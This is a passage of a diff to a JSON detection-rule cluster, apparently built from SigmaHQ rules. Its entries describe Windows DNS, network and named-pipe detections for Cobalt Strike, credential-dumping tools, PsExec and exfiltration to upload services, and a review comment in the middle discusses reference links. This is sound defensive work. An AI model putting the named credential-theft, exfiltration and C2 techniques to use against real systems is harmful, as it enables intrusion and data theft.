], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", - "value": "RDP to HTTP or HTTPS Target Ports" + "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", + "value": "DNS Query To Remote Access Software Domain" }, { "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", @@ -27057,14 +27769,14 @@ "falsepositive": [ "Unknown" ], - "filename": "net_connection_win_regsvr32_network_activity.yml", + "filename": "dns_query_win_regsvr32_network_activity.yml", "level": "high", - "logsource.category": "network_connection", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" ], "tags": [ "attack.execution", 
@@ -27073,7337 +27785,497 @@ "attack.t1218.010" ] }, - "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "value": "Regsvr32 Network Activity" + "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", + "value": "Regsvr32 Network Activity - DNS" }, { - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "description": "Detects DNS queries for subdomains used for upload to ufile.io", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/09/12", + "author": "yatinwad and TheDFIRReport", + "creation_date": "2022/06/23", "falsepositive": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Legitimate Ufile upload" ], - "filename": "net_connection_win_remote_powershell_session_network.yml", + "filename": "dns_query_win_ufile_io.yml", "level": "high", - "logsource.category": "network_connection", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" - ] - }, - "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "value": "Remote PowerShell Session (Network)" - }, - { - "description": "Detects a rundll32 that communicates with public IP addresses", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/11/04", - "falsepositive": [ - "Communication to other corporate systems that use IP addresses from public address spaces" - ], - "filename": "net_connection_win_rundll32_net_connections.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": 
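Review bot: The rebuilt `refs` entry `https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml` points at the moving `master` branch, and this very hunk shows why that is fragile: the previous `network_connection/...` link had to be replaced because upstream moved the rule. If this cluster file is produced by a generator (the layout suggests so), have it emit `blob/<sigma-commit-sha>/rules/...` links or record the Sigma commit the cluster was built from in the galaxy metadata, so the references stay resolvable and the rule version a cluster describes is reproducible. The unchanged description "Detects network connections and DNS queries initiated by Regsvr32.exe" also no longer matches a `dns_query`-only `logsource.category`; that wording comes from the upstream rule, so it belongs in a report there rather than a hand edit here. The entry's closing `uuid`/`value` lines fall in the next hunk.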
"windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" - ] - }, - "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", - "value": "Rundll32 Internet Connection" - }, - { - "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/28", - "falsepositive": [ - "Legitimate scripts" - ], - "filename": "net_connection_win_script.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", - "value": "Script Initiated Connection" - }, - { - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/08/28", - "falsepositive": [ - "Legitimate scripts" - ], - "filename": "net_connection_win_script_wan.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", - "value": "Script Initiated Connection to Non-Local Network" - }, - { - "description": "Detects a possible remote connections to Silenttrinity c2", - "meta": { - "author": "Kiran kumar s, oscd.community", - "creation_date": "2020/10/11", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.t1127.001" - ] - }, - "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", - "value": "Silenttrinity Stager Msbuild Activity" - }, - { - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/03", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - 
"https://redcanary.com/blog/raspberry-robin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "20384606-a124-4fec-acbb-8bd373728613", - "value": "Suspicious Network Connection Binary No CommandLine" - }, - { - "description": "Detects suspicious network connection by Cmstp", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_susp_cmstp.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ] - }, - "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "value": "Cmstp Making Network Connection" - }, - { - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/20", - "falsepositive": [ - "Legitimate use of the API with a tool that the author wasn't aware of" - ], - "filename": "net_connection_win_susp_dropbox_api.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", - "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" - ], - "tags": "No established tags" - }, - "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", - "value": 
"Suspicious Dropbox API Usage" - }, - { - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "meta": { - "author": "frack113, Tim Shelton (fps)", - "creation_date": "2022/07/14", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_susp_epmap.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/RiccardoAncarani/TaskShell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" - ], - "tags": [ - "attack.lateral_movement" - ] - }, - "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", - "value": "Suspicious Epmap Connection" - }, - { - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Other browsers" - ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" - ] - }, - "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "value": "Suspicious Outbound Kerberos Connection" - }, - { - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "meta": { - "author": "elhoim", - "creation_date": "2022/04/28", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", - "level": "medium", - "logsource.category": 
"network_connection", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" - ], - "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" - ] - }, - "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", - "value": "Microsoft Sync Center Suspicious Network Connections" - }, - { - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Other SMTP tools" - ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", - "https://www.ietf.org/rfc/rfc2821.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml" ], "tags": [ "attack.exfiltration", - "attack.t1048.003" + "attack.t1567.002" ] }, - "uuid": "9976fa64-2804-423c-8a5b-646ade840773", - "value": "Suspicious Outbound SMTP Connections" + "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "value": "DNS Query for Ufile.io Upload Domain" }, { - "description": "Detects programs with network connections running in suspicious files system 
locations", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2017/03/19", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/26", + "falsepositive": [ + "Legitimate Mega upload" + ], + "filename": "dns_query_win_mega_nz.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "value": "DNS Query for MEGA.io Upload Domain" + }, + { + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/09", "falsepositive": [ "Unknown" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml", - "level": "high", - "logsource.category": "network_connection", + "filename": "dns_query_win_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" ], "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1071.004" ] }, - "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "value": "Suspicious 
Program Location with Network Connections" + "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "value": "Suspicious Cobalt Strike DNS Beaconing" }, { - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/05/15", - "falsepositive": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" - ], - "filename": "net_connection_win_susp_rdp.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "value": "Suspicious Outbound RDP Connections" - }, - { - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/12", - "falsepositive": [ - "Legitimate use of wuauclt.exe over the network." 
- ], - "filename": "net_connection_win_wuauclt_network_connection.yml", - "level": "medium", - "logsource.category": "network_connection", - "logsource.product": "windows", - "refs": [ - "https://dtm.uk/wuauclt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", - "value": "Wuauclt Network Connection" - }, - { - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "creation_date": "2019/09/12", - "falsepositive": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." - ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", - "level": "medium", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "value": "Alternate PowerShell Hosts Pipe" - }, - { - "description": "Detects a named pipe used by Turla group samples", - "meta": { - "author": "Markus Neis", - "creation_date": "2017/11/06", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_apt_turla_namedpipes.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://attack.mitre.org/groups/G0010/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - 
"attack.t1106" - ] - }, - "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", - "value": "Turla Group Named Pipes" - }, - { - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/11/01", - "falsepositive": [ - "Legitimate Administrator using tool for password recovery" - ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" - ] - }, - "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", - "value": "Cred Dump-Tools Named Pipes" - }, - { - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/03", - "falsepositive": [ - "Unlikely" - ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", - "value": "DiagTrackEoP Default Named Pipe" - }, - { - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an 
image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "meta": { "author": "Florian Roth", - "creation_date": "2021/08/23", + "creation_date": "2022/01/30", "falsepositive": [ - "Unknown" + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" ], - "filename": "pipe_created_efspotato_namedpipe.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", - "https://github.com/zcgonvh/EfsPotato", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", - "value": "EfsPotato Named Pipe" - }, - { - "description": "Detects creation of default named pipes used by the Koh tool", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/08", - "falsepositive": [ - "Unlikely" - ], - "filename": "pipe_created_koh_default_pipe.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" - ] - }, - "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "value": "Koh Default Named Pipes" - }, - { - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "meta": { - "author": "Florian Roth, Wojciech Lesicki", - "creation_date": "2021/05/25", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_mal_cobaltstrike.yml", - "level": "critical", - 
"logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", - "https://github.com/Neo23x0/sigma/issues/253", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", - "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "value": "CobaltStrike Named Pipe" - }, - { - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_mal_cobaltstrike_re.yml", - "level": "critical", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "value": "CobaltStrike Named Pipe Pattern Regex" - }, - { - "description": "Detects the creation of a named pipe used by known APT malware", - "meta": { - "author": "Florian Roth, blueteam0ps, elhoim", - "creation_date": "2017/11/06", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_mal_namedpipes.yml", - "level": "critical", - "logsource.category": "pipe_created", 
- "logsource.product": "windows", - "refs": [ - "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://securelist.com/faq-the-projectsauron-apt/75533/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "value": "Malicious Named Pipe" - }, - { - "description": "Detects PAExec default named pipe", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_paexec_default_pipe.yml", + "filename": "dns_query_win_susp_teamviewer.yml", "level": "medium", - "logsource.category": "pipe_created", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "value": "PAExec Default Named Pipe" - }, - { - "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2019/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_powershell_execution_pipe.yml", - "level": "informational", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", - "value": "PowerShell Execution Via Named Pipe" - }, - { - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/12", - "falsepositive": [ - "Unknown" - ], - "filename": "pipe_created_psexec_default_pipe.yml", - "level": "low", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", - "value": "PsExec Default Named Pipe" - }, - { - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/04", - "falsepositive": [ - "Rare legitimate use of psexec from the locations mentioned above" - ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "value": "PsExec Tool Execution From Suspicious Locations - PipeName" - }, - { - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/05/10", - "falsepositive": [ - "Legitimate Administrator activity" - ], - "filename": "pipe_created_psexec_pipes_artifacts.yml", - "level": "medium", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "value": "PsExec Pipes Artifacts" - }, - { - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "meta": { - "author": "Roberto 
Rodriguez @Cyb3rWard0g", - "creation_date": "2021/10/08", - "falsepositive": [ - "Processes in the filter condition" - ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", - "https://o365blog.com/post/adfs/", - "https://github.com/Azure/SimuLand", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005" - ] - }, - "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "value": "ADFS Database Named Pipe Connection" - }, - { - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "meta": { - "author": "Florian Roth, Christian Burkard", - "creation_date": "2021/07/30", - "falsepositive": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" - ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", - "level": "high", - "logsource.category": "pipe_created", - "logsource.product": "windows", - "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "value": "CobaltStrike Named Pipe Patterns" - }, - { - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/09/01", 